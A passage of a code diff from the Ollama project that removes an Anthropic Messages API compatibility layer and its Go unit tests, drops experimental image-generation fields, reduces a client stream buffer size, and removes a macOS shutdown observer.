-		})
-
-		events = append(events, StreamEvent{
-			Event: "content_block_delta",
-			Data: ContentBlockDeltaEvent{
-				Type:  "content_block_delta",
-				Index: c.contentIndex,
-				Delta: Delta{
-					Type:        "input_json_delta",
-					PartialJSON: string(argsJSON),
-				},
-			},
-		})
-
-		events = append(events, StreamEvent{
-			Event: "content_block_stop",
-			Data: ContentBlockStopEvent{
-				Type:  "content_block_stop",
-				Index: c.contentIndex,
-			},
-		})
-
-		c.toolCallsSent[tc.ID] = true
-		c.contentIndex++
-	}
-
-	if r.Done {
-		if c.textStarted {
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-		} else if c.thinkingStarted && !c.thinkingDone {
-			events = append(events, StreamEvent{
-				Event: "content_block_stop",
-				Data: ContentBlockStopEvent{
-					Type:  "content_block_stop",
-					Index: c.contentIndex,
-				},
-			})
-		}
-
-		c.outputTokens = r.Metrics.EvalCount
-		stopReason := mapStopReason(r.DoneReason, len(c.toolCallsSent) > 0)
-
-		events = append(events, StreamEvent{
-			Event: "message_delta",
-			Data: MessageDeltaEvent{
-				Type: "message_delta",
-				Delta: MessageDelta{
-					StopReason: stopReason,
-				},
-				Usage: DeltaUsage{
-					OutputTokens: c.outputTokens,
-				},
-			},
-		})
-
-		events = append(events, StreamEvent{
-			Event: "message_stop",
-			Data: MessageStopEvent{
-				Type: "message_stop",
-			},
-		})
-	}
-
-	return events
-}
-
-// generateID generates a unique ID with the given prefix using crypto/rand
-func generateID(prefix string) string {
-	b := make([]byte, 12)
-	if _, err := rand.Read(b); err != nil {
-		// Fallback to time-based ID if crypto/rand fails
-		return fmt.Sprintf("%s_%d", prefix, time.Now().UnixNano())
-	}
-	return fmt.Sprintf("%s_%x", prefix, b)
-}
-
-// GenerateMessageID generates a unique message ID
-func GenerateMessageID() string {
-	return generateID("msg")
-}
-
-// ptr returns a pointer to the given string value
-func ptr(s string) *string {
-	return &s
-}
-
-// mapToArgs converts a map to ToolCallFunctionArguments
-func mapToArgs(m map[string]any) api.ToolCallFunctionArguments {
-	args := api.NewToolCallFunctionArguments()
-	for k, v := range m {
-		args.Set(k, v)
-	}
-	return args
-}
--- a/anthropic/anthropic_test.go
+++ b/anthropic/anthropic_test.go
@@ -1,953 +0,0 @@
-package anthropic
-
-import (
-	"encoding/base64"
-	"encoding/json"
-	"testing"
-
-	"github.com/google/go-cmp/cmp"
-
-	"github.com/ollama/ollama/api"
-)
-
-const (
-	testImage = `iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNk+A8AAQUBAScY42YAAAAASUVORK5CYII=`
-)
-
-// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests)
-func testArgs(m map[string]any) api.ToolCallFunctionArguments {
-	args := api.NewToolCallFunctionArguments()
-	for k, v := range m {
-		args.Set(k, v)
-	}
-	return args
-}
-
-func TestFromMessagesRequest_Basic(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if result.Model != "test-model" {
-		t.Errorf("expected model 'test-model', got %q", result.Model)
-	}
-
-	if len(result.Messages) != 1 {
-		t.Fatalf("expected 1 message, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Role != "user" || result.Messages[0].Content != "Hello" {
-		t.Errorf("unexpected message: %+v", result.Messages[0])
-	}
-
-	if numPredict, ok := result.Options["num_predict"].(int); !ok || numPredict != 1024 {
-		t.Errorf("expected num_predict 1024, got %v", result.Options["num_predict"])
-	}
-}
-
-func TestFromMessagesRequest_WithSystemPrompt(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		System:    "You are a helpful assistant.",
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Role != "system" || result.Messages[0].Content != "You are a helpful assistant." {
-		t.Errorf("unexpected system message: %+v", result.Messages[0])
-	}
-}
-
-func TestFromMessagesRequest_WithSystemPromptArray(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		System: []any{
-			map[string]any{"type": "text", "text": "You are helpful."},
-			map[string]any{"type": "text", "text": " Be concise."},
-		},
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Content != "You are helpful. Be concise." {
-		t.Errorf("unexpected system message content: %q", result.Messages[0].Content)
-	}
-}
-
-func TestFromMessagesRequest_WithOptions(t *testing.T) {
-	temp := 0.7
-	topP := 0.9
-	topK := 40
-	req := MessagesRequest{
-		Model:         "test-model",
-		MaxTokens:     2048,
-		Messages:      []MessageParam{{Role: "user", Content: "Hello"}},
-		Temperature:   &temp,
-		TopP:          &topP,
-		TopK:          &topK,
-		StopSequences: []string{"\n", "END"},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if result.Options["temperature"] != 0.7 {
-		t.Errorf("expected temperature 0.7, got %v", result.Options["temperature"])
-	}
-	if result.Options["top_p"] != 0.9 {
-		t.Errorf("expected top_p 0.9, got %v", result.Options["top_p"])
-	}
-	if result.Options["top_k"] != 40 {
-		t.Errorf("expected top_k 40, got %v", result.Options["top_k"])
-	}
-	if diff := cmp.Diff([]string{"\n", "END"}, result.Options["stop"]); diff != "" {
-		t.Errorf("stop sequences mismatch: %s", diff)
-	}
-}
-
-func TestFromMessagesRequest_WithImage(t *testing.T) {
-	imgData, _ := base64.StdEncoding.DecodeString(testImage)
-
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "user",
-				Content: []any{
-					map[string]any{"type": "text", "text": "What's in this image?"},
-					map[string]any{
-						"type": "image",
-						"source": map[string]any{
-							"type":       "base64",
-							"media_type": "image/png",
-							"data":       testImage,
-						},
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 1 {
-		t.Fatalf("expected 1 message, got %d", len(result.Messages))
-	}
-
-	if result.Messages[0].Content != "What's in this image?" {
-		t.Errorf("expected content 'What's in this image?', got %q", result.Messages[0].Content)
-	}
-
-	if len(result.Messages[0].Images) != 1 {
-		t.Fatalf("expected 1 image, got %d", len(result.Messages[0].Images))
-	}
-
-	if string(result.Messages[0].Images[0]) != string(imgData) {
-		t.Error("image data mismatch")
-	}
-}
-
-func TestFromMessagesRequest_WithToolUse(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{Role: "user", Content: "What's the weather in Paris?"},
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type":  "tool_use",
-						"id":    "call_123",
-						"name":  "get_weather",
-						"input": map[string]any{"location": "Paris"},
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	if len(result.Messages[1].ToolCalls) != 1 {
-		t.Fatalf("expected 1 tool call, got %d", len(result.Messages[1].ToolCalls))
-	}
-
-	tc := result.Messages[1].ToolCalls[0]
-	if tc.ID != "call_123" {
-		t.Errorf("expected tool call ID 'call_123', got %q", tc.ID)
-	}
-	if tc.Function.Name != "get_weather" {
-		t.Errorf("expected tool name 'get_weather', got %q", tc.Function.Name)
-	}
-}
-
-func TestFromMessagesRequest_WithToolResult(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "user",
-				Content: []any{
-					map[string]any{
-						"type":        "tool_result",
-						"tool_use_id": "call_123",
-						"content":     "The weather in Paris is sunny, 22°C",
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 1 {
-		t.Fatalf("expected 1 message, got %d", len(result.Messages))
-	}
-
-	msg := result.Messages[0]
-	if msg.Role != "tool" {
-		t.Errorf("expected role 'tool', got %q", msg.Role)
-	}
-	if msg.ToolCallID != "call_123" {
-		t.Errorf("expected tool_call_id 'call_123', got %q", msg.ToolCallID)
-	}
-	if msg.Content != "The weather in Paris is sunny, 22°C" {
-		t.Errorf("unexpected content: %q", msg.Content)
-	}
-}
-
-func TestFromMessagesRequest_WithTools(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages:  []MessageParam{{Role: "user", Content: "Hello"}},
-		Tools: []Tool{
-			{
-				Name:        "get_weather",
-				Description: "Get current weather",
-				InputSchema: json.RawMessage(`{"type":"object","properties":{"location":{"type":"string"}},"required":["location"]}`),
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Tools) != 1 {
-		t.Fatalf("expected 1 tool, got %d", len(result.Tools))
-	}
-
-	tool := result.Tools[0]
-	if tool.Type != "function" {
-		t.Errorf("expected type 'function', got %q", tool.Type)
-	}
-	if tool.Function.Name != "get_weather" {
-		t.Errorf("expected name 'get_weather', got %q", tool.Function.Name)
-	}
-	if tool.Function.Description != "Get current weather" {
-		t.Errorf("expected description 'Get current weather', got %q", tool.Function.Description)
-	}
-}
-
-func TestFromMessagesRequest_WithThinking(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages:  []MessageParam{{Role: "user", Content: "Hello"}},
-		Thinking:  &ThinkingConfig{Type: "enabled", BudgetTokens: 1000},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if result.Think == nil {
-		t.Fatal("expected Think to be set")
-	}
-	if v, ok := result.Think.Value.(bool); !ok || !v {
-		t.Errorf("expected Think.Value to be true, got %v", result.Think.Value)
-	}
-}
-
-// TestFromMessagesRequest_ThinkingOnlyBlock verifies that messages containing only
-// a thinking block (no text, images, or tool calls) are preserved and not dropped.
-func TestFromMessagesRequest_ThinkingOnlyBlock(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{Role: "user", Content: "Hello"},
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type":     "thinking",
-						"thinking": "Let me think about this...",
-					},
-				},
-			},
-		},
-	}
-
-	result, err := FromMessagesRequest(req)
-	if err != nil {
-		t.Fatalf("unexpected error: %v", err)
-	}
-
-	if len(result.Messages) != 2 {
-		t.Fatalf("expected 2 messages, got %d", len(result.Messages))
-	}
-
-	assistantMsg := result.Messages[1]
-	if assistantMsg.Thinking != "Let me think about this..." {
-		t.Errorf("expected thinking content, got %q", assistantMsg.Thinking)
-	}
-}
-
-func TestFromMessagesRequest_ToolUseMissingID(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type": "tool_use",
-						"name": "get_weather",
-					},
-				},
-			},
-		},
-	}
-
-	_, err := FromMessagesRequest(req)
-	if err == nil {
-		t.Fatal("expected error for missing tool_use id")
-	}
-	if err.Error() != "tool_use block missing required 'id' field" {
-		t.Errorf("unexpected error message: %v", err)
-	}
-}
-
-func TestFromMessagesRequest_ToolUseMissingName(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages: []MessageParam{
-			{
-				Role: "assistant",
-				Content: []any{
-					map[string]any{
-						"type": "tool_use",
-						"id":   "call_123",
-					},
-				},
-			},
-		},
-	}
-
-	_, err := FromMessagesRequest(req)
-	if err == nil {
-		t.Fatal("expected error for missing tool_use name")
-	}
-	if err.Error() != "tool_use block missing required 'name' field" {
-		t.Errorf("unexpected error message: %v", err)
-	}
-}
-
-func TestFromMessagesRequest_InvalidToolSchema(t *testing.T) {
-	req := MessagesRequest{
-		Model:     "test-model",
-		MaxTokens: 1024,
-		Messages:  []MessageParam{{Role: "user", Content: "Hello"}},
-		Tools: []Tool{
-			{
-				Name:        "bad_tool",
-				InputSchema: json.RawMessage(`{invalid json`),
-			},
-		},
-	}
-
-	_, err := FromMessagesRequest(req)
-	if err == nil {
-		t.Fatal("expected error for invalid tool schema")
-	}
-}
-
-func TestToMessagesResponse_Basic(t *testing.T) {
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:    "assistant",
-			Content: "Hello there!",
-		},
-		Done:       true,
-		DoneReason: "stop",
-		Metrics: api.Metrics{
-			PromptEvalCount: 10,
-			EvalCount:       5,
-		},
-	}
-
-	result := ToMessagesResponse("msg_123", resp)
-
-	if result.ID != "msg_123" {
-		t.Errorf("expected ID 'msg_123', got %q", result.ID)
-	}
-	if result.Type != "message" {
-		t.Errorf("expected type 'message', got %q", result.Type)
-	}
-	if result.Role != "assistant" {
-		t.Errorf("expected role 'assistant', got %q", result.Role)
-	}
-	if len(result.Content) != 1 {
-		t.Fatalf("expected 1 content block, got %d", len(result.Content))
-	}
-	if result.Content[0].Type != "text" || result.Content[0].Text == nil || *result.Content[0].Text != "Hello there!" {
-		t.Errorf("unexpected content: %+v", result.Content[0])
-	}
-	if result.StopReason != "end_turn" {
-		t.Errorf("expected stop_reason 'end_turn', got %q", result.StopReason)
-	}
-	if result.Usage.InputTokens != 10 || result.Usage.OutputTokens != 5 {
-		t.Errorf("unexpected usage: %+v", result.Usage)
-	}
-}
-
-func TestToMessagesResponse_WithToolCalls(t *testing.T) {
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_123",
-					Function: api.ToolCallFunction{
-						Name:      "get_weather",
-						Arguments: testArgs(map[string]any{"location": "Paris"}),
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	result := ToMessagesResponse("msg_123", resp)
-
-	if len(result.Content) != 1 {
-		t.Fatalf("expected 1 content block, got %d", len(result.Content))
-	}
-	if result.Content[0].Type != "tool_use" {
-		t.Errorf("expected type 'tool_use', got %q", result.Content[0].Type)
-	}
-	if result.Content[0].ID != "call_123" {
-		t.Errorf("expected ID 'call_123', got %q", result.Content[0].ID)
-	}
-	if result.Content[0].Name != "get_weather" {
-		t.Errorf("expected name 'get_weather', got %q", result.Content[0].Name)
-	}
-	if result.StopReason != "tool_use" {
-		t.Errorf("expected stop_reason 'tool_use', got %q", result.StopReason)
-	}
-}
-
-func TestToMessagesResponse_WithThinking(t *testing.T) {
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:     "assistant",
-			Content:  "The answer is 42.",
-			Thinking: "Let me think about this...",
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	result := ToMessagesResponse("msg_123", resp)
-
-	if len(result.Content) != 2 {
-		t.Fatalf("expected 2 content blocks, got %d", len(result.Content))
-	}
-	if result.Content[0].Type != "thinking" {
-		t.Errorf("expected first block type 'thinking', got %q", result.Content[0].Type)
-	}
-	if result.Content[0].Thinking == nil || *result.Content[0].Thinking != "Let me think about this..." {
-		t.Errorf("unexpected thinking content: %v", result.Content[0].Thinking)
-	}
-	if result.Content[1].Type != "text" {
-		t.Errorf("expected second block type 'text', got %q", result.Content[1].Type)
-	}
-}
-
-func TestMapStopReason(t *testing.T) {
-	tests := []struct {
-		reason       string
-		hasToolCalls bool
-		want         string
-	}{
-		{"stop", false, "end_turn"},
-		{"length", false, "max_tokens"},
-		{"stop", true, "tool_use"},
-		{"other", false, "stop_sequence"},
-		{"", false, ""},
-	}
-
-	for _, tt := range tests {
-		got := mapStopReason(tt.reason, tt.hasToolCalls)
-		if got != tt.want {
-			t.Errorf("mapStopReason(%q, %v) = %q, want %q", tt.reason, tt.hasToolCalls, got, tt.want)
-		}
-	}
-}
-
-func TestNewError(t *testing.T) {
-	tests := []struct {
-		code int
-		want string
-	}{
-		{400, "invalid_request_error"},
-		{401, "authentication_error"},
-		{403, "permission_error"},
-		{404, "not_found_error"},
-		{429, "rate_limit_error"},
-		{500, "api_error"},
-		{503, "overloaded_error"},
-		{529, "overloaded_error"},
-	}
-
-	for _, tt := range tests {
-		result := NewError(tt.code, "test message")
-		if result.Type != "error" {
-			t.Errorf("NewError(%d) type = %q, want 'error'", tt.code, result.Type)
-		}
-		if result.Error.Type != tt.want {
-			t.Errorf("NewError(%d) error.type = %q, want %q", tt.code, result.Error.Type, tt.want)
-		}
-		if result.Error.Message != "test message" {
-			t.Errorf("NewError(%d) message = %q, want 'test message'", tt.code, result.Error.Message)
-		}
-		if result.RequestID == "" {
-			t.Errorf("NewError(%d) request_id should not be empty", tt.code)
-		}
-	}
-}
-
-func TestGenerateMessageID(t *testing.T) {
-	id1 := GenerateMessageID()
-	id2 := GenerateMessageID()
-
-	if id1 == "" {
-		t.Error("GenerateMessageID returned empty string")
-	}
-	if id1 == id2 {
-		t.Error("GenerateMessageID returned duplicate IDs")
-	}
-	if len(id1) < 10 {
-		t.Errorf("GenerateMessageID returned short ID: %q", id1)
-	}
-	if id1[:4] != "msg_" {
-		t.Errorf("GenerateMessageID should start with 'msg_', got %q", id1[:4])
-	}
-}
-
-func TestStreamConverter_Basic(t *testing.T) {
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	// First chunk
-	resp1 := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:    "assistant",
-			Content: "Hello",
-		},
-		Metrics: api.Metrics{PromptEvalCount: 10},
-	}
-
-	events1 := conv.Process(resp1)
-	if len(events1) < 3 {
-		t.Fatalf("expected at least 3 events for first chunk, got %d", len(events1))
-	}
-
-	// Should have message_start, content_block_start, content_block_delta
-	if events1[0].Event != "message_start" {
-		t.Errorf("expected first event 'message_start', got %q", events1[0].Event)
-	}
-	if events1[1].Event != "content_block_start" {
-		t.Errorf("expected second event 'content_block_start', got %q", events1[1].Event)
-	}
-	if events1[2].Event != "content_block_delta" {
-		t.Errorf("expected third event 'content_block_delta', got %q", events1[2].Event)
-	}
-
-	// Final chunk
-	resp2 := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role:    "assistant",
-			Content: " world!",
-		},
-		Done:       true,
-		DoneReason: "stop",
-		Metrics:    api.Metrics{EvalCount: 5},
-	}
-
-	events2 := conv.Process(resp2)
-
-	// Should have content_block_delta, content_block_stop, message_delta, message_stop
-	hasStop := false
-	for _, e := range events2 {
-		if e.Event == "message_stop" {
-			hasStop = true
-		}
-	}
-	if !hasStop {
-		t.Error("expected message_stop event in final chunk")
-	}
-}
-
-func TestStreamConverter_WithToolCalls(t *testing.T) {
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_123",
-					Function: api.ToolCallFunction{
-						Name:      "get_weather",
-						Arguments: testArgs(map[string]any{"location": "Paris"}),
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-		Metrics:    api.Metrics{PromptEvalCount: 10, EvalCount: 5},
-	}
-
-	events := conv.Process(resp)
-
-	hasToolStart := false
-	hasToolDelta := false
-	for _, e := range events {
-		if e.Event == "content_block_start" {
-			if start, ok := e.Data.(ContentBlockStartEvent); ok {
-				if start.ContentBlock.Type == "tool_use" {
-					hasToolStart = true
-				}
-			}
-		}
-		if e.Event == "content_block_delta" {
-			if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
-				if delta.Delta.Type == "input_json_delta" {
-					hasToolDelta = true
-				}
-			}
-		}
-	}
-
-	if !hasToolStart {
-		t.Error("expected tool_use content_block_start event")
-	}
-	if !hasToolDelta {
-		t.Error("expected input_json_delta event")
-	}
-}
-
-func TestStreamConverter_ToolCallWithUnmarshalableArgs(t *testing.T) {
-	// Test that unmarshalable arguments (like channels) are handled gracefully
-	// and don't cause a panic or corrupt stream
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	// Create a channel which cannot be JSON marshaled
-	unmarshalable := make(chan int)
-	badArgs := api.NewToolCallFunctionArguments()
-	badArgs.Set("channel", unmarshalable)
-
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_bad",
-					Function: api.ToolCallFunction{
-						Name:      "bad_function",
-						Arguments: badArgs,
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	// Should not panic and should skip the unmarshalable tool call
-	events := conv.Process(resp)
-
-	// Verify no tool_use block was started (since marshal failed before block start)
-	hasToolStart := false
-	for _, e := range events {
-		if e.Event == "content_block_start" {
-			if start, ok := e.Data.(ContentBlockStartEvent); ok {
-				if start.ContentBlock.Type == "tool_use" {
-					hasToolStart = true
-				}
-			}
-		}
-	}
-
-	if hasToolStart {
-		t.Error("expected no tool_use block when arguments cannot be marshaled")
-	}
-}
-
-func TestStreamConverter_MultipleToolCallsWithMixedValidity(t *testing.T) {
-	// Test that valid tool calls still work when mixed with invalid ones
-	conv := NewStreamConverter("msg_123", "test-model")
-
-	unmarshalable := make(chan int)
-	badArgs := api.NewToolCallFunctionArguments()
-	badArgs.Set("channel", unmarshalable)
-
-	resp := api.ChatResponse{
-		Model: "test-model",
-		Message: api.Message{
-			Role: "assistant",
-			ToolCalls: []api.ToolCall{
-				{
-					ID: "call_good",
-					Function: api.ToolCallFunction{
-						Name:      "good_function",
-						Arguments: testArgs(map[string]any{"location": "Paris"}),
-					},
-				},
-				{
-					ID: "call_bad",
-					Function: api.ToolCallFunction{
-						Name:      "bad_function",
-						Arguments: badArgs,
-					},
-				},
-			},
-		},
-		Done:       true,
-		DoneReason: "stop",
-	}
-
-	events := conv.Process(resp)
-
-	// Count tool_use blocks - should only have 1 (the valid one)
-	toolStartCount := 0
-	toolDeltaCount := 0
-	for _, e := range events {
-		if e.Event == "content_block_start" {
-			if start, ok := e.Data.(ContentBlockStartEvent); ok {
-				if start.ContentBlock.Type == "tool_use" {
-					toolStartCount++
-					if start.ContentBlock.Name != "good_function" {
-						t.Errorf("expected tool name 'good_function', got %q", start.ContentBlock.Name)
-					}
-				}
-			}
-		}
-		if e.Event == "content_block_delta" {
-			if delta, ok := e.Data.(ContentBlockDeltaEvent); ok {
-				if delta.Delta.Type == "input_json_delta" {
-					toolDeltaCount++
-				}
-			}
-		}
-	}
-
-	if toolStartCount != 1 {
-		t.Errorf("expected 1 tool_use block, got %d", toolStartCount)
-	}
-	if toolDeltaCount != 1 {
-		t.Errorf("expected 1 input_json_delta, got %d", toolDeltaCount)
-	}
-}
-
-// TestContentBlockJSON_EmptyFieldsPresent verifies that empty text and thinking fields
-// are serialized in JSON output. The Anthropic SDK requires these fields to be present
-// (even when empty) in content_block_start events to properly accumulate streaming deltas.
-// Without these fields, the SDK throws: "TypeError: unsupported operand type(s) for +=: 'NoneType' and 'str'"
-func TestContentBlockJSON_EmptyFieldsPresent(t *testing.T) {
-	tests := []struct {
-		name     string
-		block    ContentBlock
-		wantKeys []string
-	}{
-		{
-			name: "text block includes empty text field",
-			block: ContentBlock{
-				Type: "text",
-				Text: ptr(""),
-			},
-			wantKeys: []string{"type", "text"},
-		},
-		{
-			name: "thinking block includes empty thinking field",
-			block: ContentBlock{
-				Type:     "thinking",
-				Thinking: ptr(""),
-			},
-			wantKeys: []string{"type", "thinking"},
-		},
-		{
-			name: "text block with content",
-			block: ContentBlock{
-				Type: "text",
-				Text: ptr("hello"),
-			},
-			wantKeys: []string{"type", "text"},
-		},
-	}
-
-	for _, tt := range tests {
-		t.Run(tt.name, func(t *testing.T) {
-			data, err := json.Marshal(tt.block)
-			if err != nil {
-				t.Fatalf("failed to marshal: %v", err)
-			}
-
-			var result map[string]any
-			if err := json.Unmarshal(data, &result); err != nil {
-				t.Fatalf("failed to unmarshal: %v", err)
-			}
-
-			for _, key := range tt.wantKeys {
-				if _, ok := result[key]; !ok {
-					t.Errorf("expected key %q to be present in JSON output, got: %s", key, string(data))
-				}
-			}
-		})
-	}
-}
-
-// TestStreamConverter_ContentBlockStartIncludesEmptyFields verifies that content_block_start
-// events include the required empty fields for SDK compatibility.
-func TestStreamConverter_ContentBlockStartIncludesEmptyFields(t *testing.T) {
-	t.Run("text block start includes empty text", func(t *testing.T) {
-		conv := NewStreamConverter("msg_123", "test-model")
-
-		resp := api.ChatResponse{
-			Model:   "test-model",
-			Message: api.Message{Role: "assistant", Content: "hello"},
-		}
-
-		events := conv.Process(resp)
-
-		var foundTextStart bool
-		for _, e := range events {
-			if e.Event == "content_block_start" {
-				if start, ok := e.Data.(ContentBlockStartEvent); ok {
-					if start.ContentBlock.Type == "text" {
-						foundTextStart = true
-						// Marshal and verify the text field is present
-						data, _ := json.Marshal(start)
-						var result map[string]any
-						json.Unmarshal(data, &result)
-						cb := result["content_block"].(map[string]any)
-						if _, ok := cb["text"]; !ok {
-							t.Error("content_block_start for text should include 'text' field")
-						}
-					}
-				}
-			}
-		}
-
-		if !foundTextStart {
-			t.Error("expected text content_block_start event")
-		}
-	})
-
-	t.Run("thinking block start includes empty thinking", func(t *testing.T) {
-		conv := NewStreamConverter("msg_123", "test-model")
-
-		resp := api.ChatResponse{
-			Model:   "test-model",
-			Message: api.Message{Role: "assistant", Thinking: "let me think..."},
-		}
-
-		events := conv.Process(resp)
-
-		var foundThinkingStart bool
-		for _, e := range events {
-			if e.Event == "content_block_start" {
-				if start, ok := e.Data.(ContentBlockStartEvent); ok {
-					if start.ContentBlock.Type == "thinking" {
-						foundThinkingStart = true
-						data, _ := json.Marshal(start)
-						var result map[string]any
-						json.Unmarshal(data, &result)
-						cb := result["content_block"].(map[string]any)
-						if _, ok := cb["thinking"]; !ok {
-							t.Error("content_block_start for thinking should include 'thinking' field")
-						}
-					}
-				}
-			}
-		}
-
-		if !foundThinkingStart {
-			t.Error("expected thinking content_block_start event")
-		}
-	})
-}
--- a/api/client.go
+++ b/api/client.go
@@ -165,7 +165,7 @@ func (c *Client) do(ctx context.Context, method, path string, reqData, respData
 	return nil
 }

-const maxBufferSize = 8 * format.MegaByte
+const maxBufferSize = 512 * format.KiloByte

 func (c *Client) stream(ctx context.Context, method, path string, data any, fn func([]byte) error) error {
 	var buf io.Reader
--- a/api/types.go
+++ b/api/types.go
@@ -127,20 +127,6 @@ type GenerateRequest struct {
 	// each with an associated log probability. Only applies when Logprobs is true.
 	// Valid values are 0-20. Default is 0 (only return the selected token's logprob).
 	TopLogprobs int `json:"top_logprobs,omitempty"`
-
-	// Experimental: Image generation fields (may change or be removed)
-
-	// Width is the width of the generated image in pixels.
-	// Only used for image generation models.
-	Width int32 `json:"width,omitempty"`
-
-	// Height is the height of the generated image in pixels.
-	// Only used for image generation models.
-	Height int32 `json:"height,omitempty"`
-
-	// Steps is the number of diffusion steps for image generation.
-	// Only used for image generation models.
-	Steps int32 `json:"steps,omitempty"`
 }

 // ChatRequest describes a request sent by [Client.Chat].
@@ -874,20 +860,6 @@ type GenerateResponse struct {
 	// Logprobs contains log probability information for the generated tokens,
 	// if requested via the Logprobs parameter.
 	Logprobs []Logprob `json:"logprobs,omitempty"`
-
-	// Experimental: Image generation fields (may change or be removed)
-
-	// Image contains a base64-encoded generated image.
-	// Only present for image generation models.
-	Image string `json:"image,omitempty"`
-
-	// Completed is the number of completed steps in image generation.
-	// Only present for image generation models during streaming.
-	Completed int64 `json:"completed,omitempty"`
-
-	// Total is the total number of steps for image generation.
-	// Only present for image generation models during streaming.
-	Total int64 `json:"total,omitempty"`
 }

 // ModelDetails provides details about a model.
--- a/app/cmd/app/app_darwin.m
+++ b/app/cmd/app/app_darwin.m
@@ -14,7 +14,6 @@ extern NSString *SystemWidePath;
@interface AppDelegate () <NSWindowDelegate, WKNavigationDelegate, WKUIDelegate>
@property(strong, nonatomic) NSStatusItem *statusItem;
@property(assign, nonatomic) BOOL updateAvailable;
-@property(assign, nonatomic) BOOL systemShutdownInProgress;
@end

@implementation AppDelegate
@@ -41,13 +40,6 @@ bool firstTimeRun,startHidden; // Set in run before initialization
 }

 - (void)applicationDidFinishLaunching:(NSNotification *)aNotification {
-    // Register for system shutdown/restart notification so we can allow termination
-    [[[NSWorkspace sharedWorkspace] notificationCenter]
-        addObserver:self
-           selector:@selector(systemWillPowerOff:)
-               name:NSWorkspaceWillPowerOffNotification
-             object:nil];
-
    // if we're in development mode, set the app icon
    NSString *bundlePath = [[NSBundle mainBundle] bundlePath];
    if (![bundlePath hasSuffix:@".app"]) {
@@ -286,18 +278,7 @@ bool firstTimeRun,startHidden; // Set in run before initialization
    [NSApp activateIgnoringOtherApps:YES];
 }

